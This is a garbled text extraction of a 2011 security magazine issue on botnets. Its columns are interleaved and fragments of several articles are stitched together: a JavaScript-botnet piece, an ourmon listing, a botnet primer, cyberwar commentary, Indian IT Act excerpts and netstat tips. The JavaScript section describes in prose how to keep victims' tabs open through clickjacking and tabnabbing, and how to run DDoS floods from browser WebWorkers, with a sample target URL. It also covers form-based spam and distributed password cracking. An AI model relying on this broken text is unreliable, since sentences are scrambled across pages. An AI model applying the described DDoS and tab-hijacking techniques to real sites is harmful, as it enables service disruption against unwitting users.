Professional Documents
Culture Documents
fast over the recent years. Moreover HTML5 2) Extending execution lifetime:
introduces WebWorkers which is a Once a victim visits the attacker controlled
threading model for JavaScript. This lets page it is essential to keep this page open in
any website start a background JavaScript the victim‘s browser for as long as possible.
thread unknown to the user and execute This can be done by using a combination of
code without slowing down or making the Clickjacking and Tabnabbing.
browser unresponsive. When the page is loaded, it would contain
an invisible link with the target attribute set
to ‗_blank‘. This link is always placed under
Creating a JavaScript Botnet: the mouse pointer using the
A JavaScript botnet would include ‗document.onmousemove‘ event handler.
thousands of systems that have the attacker This way, when the victim clicks anywhere
controlled page open on their browsers for on the page a new tab opens and grabs the
an extended duration allowing continued victim‘s attention. With multiple tabs open
execution of the attacker‘s JavaScript. the likelihood of the victim coming back to
There are two phases in building such a the main tab and closing it is reduced.
botnet: To add to this effect Tabnabbing can be
1) Reaching out to victims used to refresh the page after the user leaves
2) Extending execution lifetime it, to update the favicon and appearance to
seem similar to popular websites like
1) Reaching out to victims : YouTube, Google or Facebook so that the
page blends in with the other tabs the victim
This involves getting the victim to visit an would usually have open. There is a working
attacker controlled website. This can be demo[http://www.andlabs.org/hacks/xtend
done in a number of different ways: _life.html] for this available on the Attack
1) Email spam and Defense Labs website.
2) Trending topics on Twitter
3) Persistent XSS on popular websites, JavaScript botnet activities:
forums etc JavaScript botnets can be used to perform
4) Search Engine Poisoning the same activities that are performed by
5) Compromised websites traditional botnets.
6) Abusing URL Shortners This article will discuss three such activities:
1) Application‐level DDoS attacks
These are methods used by current 2) Email Spam
JavaScript malware authors to attack 3) Distributed password cracking
victims to their website and can draw
thousands of victms. While traditional 1) Application‐level DDoS attacks
malware spreading website can be quickly DDoS attacks have been all over news in
identified due to automated crawlers recent time as activists belonging to either
looking for signatures of browser exploits, side of the Wikileaks debate took out each
JavaScript botnet payloads are less likely to others websites. Firms like Mastercard and
be identified since its regular JavaScript Visa have suffered significant losses due to
working within the constraints of the this.
sandbox and does not perform any
exploitation against the browsers.
Issue 12 – Jan 2011 | Page - 5
Application‐level DDoS attack is an effective unlikely that the user will even sense that he
type of DDoS attack that has affected even is part of a DDoS attack.
sites like Twitter. Usually these attacks 2) Email Spam
involve large number for HTTP requests to Spam mails are largely sent using
specific sections of the website that could open‐relay mail servers and botnet zombies.
potentially be resource intensive for the Though it would not be possible to a regular
server to process. open‐relay mail server from JavaScript still
Background JavaScript threads that were it would be possible to send such spam
started using WebWorkers can send cross mails through the web equivalent of
domain XMLHttpRequests even though the open‐relay mails servers.
remote website does not support it. The Many websites have feedback sections
Cross Origin Request security restriction is which ask the user to enter their name,
only on reading the response. email ID, subject and feedback. Once these
A website that does not support Cross are entered and the form is submitted, the
Origin requests will also process these server would craft this in the form of an
request thereby creating load on the server. email, with hard‐coded from and to mail
A simple request like addresses and send it to the internal mail
http://www.target.site/search_product.php server.
?product_id=% when sent in large numbers Poorly designed websites would contain the
can create serve performance issues on the from and to mail addresses in hidden form
server. fields on the browser and by overwriting
A browser can send surprisingly large of them to external addresses it should be
GET requests to a remote website using possible to send mails with spoofed
COR from WebWorkers. During tests it was addresses if the company‘s mail server is
found that around 10,000 requests/minute also configured to operate in an open‐relay
can be sent from a single browser. With mode.
even a very small botnet of just 600 zombies Since only GET requests can be sent
we would be sending around 100,000 through COR, the feedback form should
requests/sec, depending on the nature of either be sending all data in QueryString or
the page being requested this could be it should be differentiating between
enough to bring a website down. QueryString and POST parameters.
After I wrote about DDoS attacks with COR Alternatively if it is JSP page then HTTP
a very smart person[http://shellex.info] Parameter Pollution can be used to submit
showed me that similar numbers could also forms over GET.
be achieved by using the img tag to request
remote resources. Ben Schmidt has gone 3) Distributed password cracking
one step further by creating a malcious URL Password cracking has always been a task
shortening service called assigned for programs written in native
d0z.me[http://d0z.me/]. d0z.me seems to code with performance enhancement by
work like any other URL shortening service writing some sections in Assembly. With its
but it actually shows the destination page in relatively slower execution rate JavaScript
an iframe while perform DoS attacks on a has never been considered for performing
target website from the victim's browser. It such resource‐intensive tasks.
executes this so well that it is extremly Things however have changed, JavaScript
engines in modern browser are becoming
Issue 12 – Jan 2011 | Page - 6
[root@localhost mrourmon]# cd
bin/
[root@localhost bin]# ls
batchipall.sh daily.pl
logbackup.pl mklogdir.sh
ombatchip.pl ombatchsyn.pl
omupdate.sh ourmon.sh ssh.pl
udpreport.pl batchip.sh
irc.pl makebar.pl
monbackup.pl ombatchipsrc.pl
omupdate.pl ourmon
sshdb.pl tcpworm.pl
wormtolog.pl
[root@localhost bin]#
----------------------------------------------------
DNS RRDs:
Issue 12 – Jan 2011 | Page - 14
UDP Summarizations:
Issue 12 – Jan 2011 | Page - 16
Documentation
1. http://sourceforge.net/projects/our
mon/
2. http://ourmon.sourceforge.net/
Issue 12 – Jan 2011 | Page - 18
So what exactly are Botnets? The Botmaster tries to install the malicious
A bot can be a single system infected with code in the users system by wooing them to
malicious software/code and a collection of access/download a fake file. Once the
bots form a botnet which is controlled by system is infected with the code, it tries to
the commands of the botnet controller. infect other systems connected to it. The
The above description contains some infected systems are known as ―Zombies‖.
specific terminologies which need to be Thus the infection is spread exponentially
understood in order to understand the into the computer systems and an army of
working of botnets.
A botnet starts with malicious code written
by the attacker. The attacker infects a single
system/server with the code. This in turn is
used by the attacker as Command and
Control (C&C) center for further infection.
The attacker here is often termed as
―Botmaster‖.
zombies is created
All the Zombies are connected to the
attacker by a Command and Control Center
(C&C). Attacker can send any commands to
all systems to which the connection has
been established using this.All this happens
with absolute no knowledge to the user.
Issue 12 – Jan 2011 | Page - 20
Most of the systems which fall prey to Now attackers are even trying to hide into a
botnets are often unpatched systems. system using rootkit technology. Rootkits
Attackers try to exploit known are the most stealth and undetectable
vulnerabilities of a system. A specific botnet malwares. Attackers have been trying to
can be designed to exploit a specific incorporate this kind of technology to avoid
vulnerability. In such cases, attacker only detection.
makes changes to the malwares it drops into
victims system. These kind of botnets have
All work and no play makes
the same basic architecture and hence are jack a dull boy –
variants of their previous.
With all its strategies,
techniques and its spread,
what does a botnet do?
File Delivery :
Typically botnets evolved with
By now it is quite clear, that every botnet a view to demonstrate
involves some kind of malware which is programming skills of its
creator.
deployed onto victim machine. When a But with its technological
system has been compromised, attacker advances, botnets are now a
acquires sufficient rights and lethal weapon for cyber
sends/downloads malwares into the victim criminals and hackers. Botnets
machine. Attacker may use utilities are now used for,
provided by IRC server for
- DDoS
download/upload purpose.
- Spamming
Attacker may also use HTTP/FTP protocols - Phishing
- Financial Frauds
to send/receive files depending upon the
- Identity Theft
system vulnerabilities. - Cheating in online games /polls
- Click Frauds
Issue 12 – Jan 2011 | Page - 22
- Espionage
And of course,
for hacking resources to be hired, with very deep link with SCADA and Industrial
specific goals. Automation (IA) security.
2005 observed the official claim of attacks Today‘s trends see IAs and MoDs deeply
pointing to China as the source of them, and scouting hacker‘s environments and
popped up the very big issue of the Source underground, hiring specialized know-how
of the Attack or Attack Source Attribution, for mission-oriented capabilities, such as 0-
that‘s still pending today. Days e-arsenary, launching cyber attacks,
protecting National Security, rather than
Finally, since 2008 up to now we started relying on the Industry and the
being aware of National Critical Underground and Public communities in
Infrastructures (NCIs) and those issue while order to analyze malware and obtain early
trying to secure them, summed up to the
Issue 12 – Jan 2011 | Page - 25
―In the very near future, many conflicts will It‘s not a futuristic scenario, here we are
not take place on the open field of battle, talking about something that already
but rather in spaces on the Internet, fought happened a long time ago. It was in the
with the aid on information soldiers… middle of the 80‘s when CCC members
Hagbard and Pengo used to hack into
This means that a small force of hackers is
Government and Military contracts, as well
stronger than the multi-thousand force of
as centers and research labs, in the USA,
the current armed forces.‖
giving back the results of their hacks to the
Nowadays many States already began, KGB and receiving money and facilities
trough their Minister of Defence, to work on from them. Hagbard was found dead,
topics such as an Official Cyber Doctrine, hanged to a tree out of the town he was
Cyberwarfare Training, Cyberwarfare living it, and burned.
exercise and simulations, building an IT
Vodafone Head of Network Design, possibly
roadmap (from a military and National
involved in the 2005 Vodafone Greece
Security point of view), working as well with
affair, was found suicide. The same for
the IT industry and technical universities
Adamo Bove, working at Telecom Italia
(see Malaysia, China and many others),
Lawful Interception System. And, the same
establishing Information Warfare units and,
recently happened to Majid Shahriari in
obviously, starting keeping record of
Iran, and everything seems to be related to
hacking activities on other Nations.
the Stuxnet worm
(http://www.debka.com/article/20406/).
Issue 12 – Jan 2011 | Page - 27
Introduction Sec. 43
A botnet (a contraction of the term If any person without permission of the
―RoBOT NETwork‖) is a computer owner or any other person who is incharge
network made up of a vast number of of a computer, computer system or
compromised computers that have computer network,—
been infected with malicious code, and can
be remotely-controlled through (c) Introduces or causes to be introduced
commands sent via the Internet. any computer contaminant or computer
Typically, users whose computers have been virus into any computer, computer system
conscripted into a botnet are unaware that or computer network;
their computers have been compromised.
The computer so affected is called as He shall be liable to pay damages by the way
“Zombie”. of compensation to the person so affected;
Sec. 66
C:\> wmic process where Aah! I hate & love the case sensitivity of
processid="pid" list full Linux environment. And that‘s why we use
–i to ignore case while searching and use
This will tell you the process with your only ―listen‖ in filter as it may differ among
chosen PID. various Linux flavors.
You may also try other switches of netstat I know Linux users are geek themselves, so
like this article was just a reminder that don‘t
forget your friend netstat, keep using it
-b = display executable name responsible
for the connection
-p = specific protocol
-o = display process ID
-a = display all
Rohit Srivastwa
But the most interesting you‘ll find is using
rohit@clubhack.com
a continous netstat to keep looking at the
results
Linux
For linux more or less all the parameters are
same. You may want to try the same
command on linux too. Remember
parameter for netstat are same, not the
other executables
Like the first example in linux will become